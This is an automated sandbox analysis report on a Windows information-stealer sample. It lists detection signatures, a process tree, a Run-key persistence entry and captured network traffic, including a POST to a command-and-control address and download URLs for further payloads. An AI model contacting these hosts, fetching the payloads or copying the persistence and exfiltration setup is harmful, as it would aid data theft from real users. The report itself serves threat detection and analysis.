Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ubes6SC7Vd.exe

Overview

General Information

Sample name:ubes6SC7Vd.exe
renamed because original name is a hash value
Original sample name:f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb.exe
Analysis ID:1462351
MD5:7ddeccf7c147ea2b90426aeb43277096
SHA1:a350f7403f25add29a464491d37f56b5381d4a73
SHA256:f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb
Tags:104-194-134-68172-86-105-109droppedexeRustyStealer
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses whoami command line tool to query computer and username
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ubes6SC7Vd.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\ubes6SC7Vd.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
    • svrreve.exe (PID: 7536 cmdline: "C:\ProgramData\uovan\svrreve.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
      • WerFault.exe (PID: 7040 cmdline: C:\Windows\system32\WerFault.exe -u -p 7536 -s 2476 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7620 cmdline: timeout 7 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • whoami.exe (PID: 7832 cmdline: whoami MD5: A4A6924F3EAF97981323703D38FD99C4)
  • svrreve.exe (PID: 7924 cmdline: "C:\ProgramData\uovan\svrreve.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
    • WerFault.exe (PID: 8028 cmdline: C:\Windows\system32\WerFault.exe -u -p 7924 -s 820 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svrreve.exe (PID: 8076 cmdline: "C:\ProgramData\uovan\svrreve.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
    • WerFault.exe (PID: 8132 cmdline: C:\Windows\system32\WerFault.exe -u -p 8076 -s 832 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ubes6SC7Vd.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    ubes6SC7Vd.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\uovan\svrreve.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        C:\ProgramData\uovan\svrreve.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  00000000.00000000.1687370695.00000258F28F2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.ubes6SC7Vd.exe.258f28f65d4.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      0.0.ubes6SC7Vd.exe.258f28f0000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        0.0.ubes6SC7Vd.exe.258f28f0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                          Sigma Signatures

                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\uovan\svrreve.exe", EventID: 13, EventType: SetValue, Image: C:\ProgramData\uovan\svrreve.exe, ProcessId: 7536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xohtsts
                          Sigma detected: Local Accounts Discovery
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: whoami, CommandLine: whoami, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: whoami, ProcessId: 7832, ProcessName: whoami.exe

                          Snort Signatures

                          No Snort rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: ubes6SC7Vd.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\ProgramData\uovan\svrreve.exeAvira: detection malicious, Label: TR/Spy.Gen8
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\uovan\svrreve.exeReversingLabs: Detection: 44%
                          Source: C:\ProgramData\uovan\svrreve.exeVirustotal: Detection: 56%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: ubes6SC7Vd.exeVirustotal: Detection: 56%Perma Link
                          Source: ubes6SC7Vd.exeReversingLabs: Detection: 44%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\ProgramData\uovan\svrreve.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: ubes6SC7Vd.exeJoe Sandbox ML: detected
                          Source: ubes6SC7Vd.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49755 version: TLS 1.2
                          Source: ubes6SC7Vd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdb source: ubes6SC7Vd.exe, svrreve.exe.0.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: pC:\ProgramData\uovan\svrreve.PDB source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Drawing.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbw source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\System.pdbe' source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb` source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: \assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Core.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: C:\ProgramData\uovan\svrreve.PDBm source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Net.Http.pdbSystem.Management.dll source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb0 source: WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdbra source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdbR source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb=. source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZ source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdbz source: ubes6SC7Vd.exe, svrreve.exe.0.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Net.Http.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: C:\ProgramData\uovan\svrreve.PDB source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Xml.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Net.Http.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Drawing.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Management.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: svrreve.PDBdQ source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Management.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Core.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: indoC:\Windows\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeCode function: 4x nop then jmp 00007FFD9BA1745Ah0_2_00007FFD9BA17309
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then cmp dword ptr [ebp-58h], 00000000h2_2_00007FFD9BA11312
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then dec eax2_2_00007FFD9BA116FC
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then jmp 00007FFD9BA120ACh2_2_00007FFD9BA116FC
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then dec eax2_2_00007FFD9BA11702
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then dec eax2_2_00007FFD9BA116FC
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then jmp 00007FFD9BA120ACh2_2_00007FFD9BA116FC
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then cmp dword ptr [ebp-58h], 00000000h2_2_00007FFD9BA179B5
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then dec eax13_2_00007FFD9BA01318
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 4x nop then jmp 00007FFD9BA020ACh13_2_00007FFD9BA01318

                          Networking

                          barindex
                          Connects to a pastebin service (likely for C&C)
                          Source: unknownDNS query: name: pastebin.com
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: ubes6SC7Vd.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.ubes6SC7Vd.exe.258f28f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\ProgramData\uovan\svrreve.exe, type: DROPPED
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /raw/fR7B5m9E HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /hook/upgrade.php HTTP/1.1Content-Type: multipart/form-data; boundary="b52924a5-c491-4bc6-982a-722aba884181"Host: 172.86.105.109Content-Length: 428Expect: 100-continueConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                          Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                          Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.105.109
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.appConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.app
                          Source: global trafficHTTP traffic detected: GET /raw/fR7B5m9E HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipwhois.appConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: ipwhois.app
                          Source: global trafficDNS traffic detected: DNS query: pastebin.com
                          Source: unknownHTTP traffic detected: POST /hook/upgrade.php HTTP/1.1Content-Type: multipart/form-data; boundary="b52924a5-c491-4bc6-982a-722aba884181"Host: 172.86.105.109Content-Length: 428Expect: 100-continueConnection: Keep-Alive
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E76000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, svrreve.exe.0.drString found in binary or memory: http://172.86.105.109
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.86.105.109(f
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.86.105.109/hook/upgrade.php
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.86.105.109/hook/upgrade.php2
                          Source: ubes6SC7Vd.exe, svrreve.exe.0.drString found in binary or memory: http://172.86.105.109/ups/Snup.bat
                          Source: ubes6SC7Vd.exe, svrreve.exe.0.drString found in binary or memory: http://172.86.105.109/ups/ddttd.exe
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258800B0000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F49000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FCF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E50000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FA6000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwhois.app
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipwhois.app/xml/
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FEB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F65000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E71000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0EE3000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC1018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
                          Source: svrreve.exe.0.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
                          Source: svrreve.exe.0.drString found in binary or memory: https://github.com/clap-rs/clap/issues
                          Source: ubes6SC7Vd.exe, svrreve.exe.0.drString found in binary or memory: https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc
                          Source: svrreve.exe.0.drString found in binary or memory: https://github.com/clap-rs/clap/issuesC:
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880103000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwhois.app
                          Source: ubes6SC7Vd.exe, svrreve.exe.0.drString found in binary or memory: https://ipwhois.app/xml/
                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                          Source: svrreve.exe, 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/fR7B5m9E
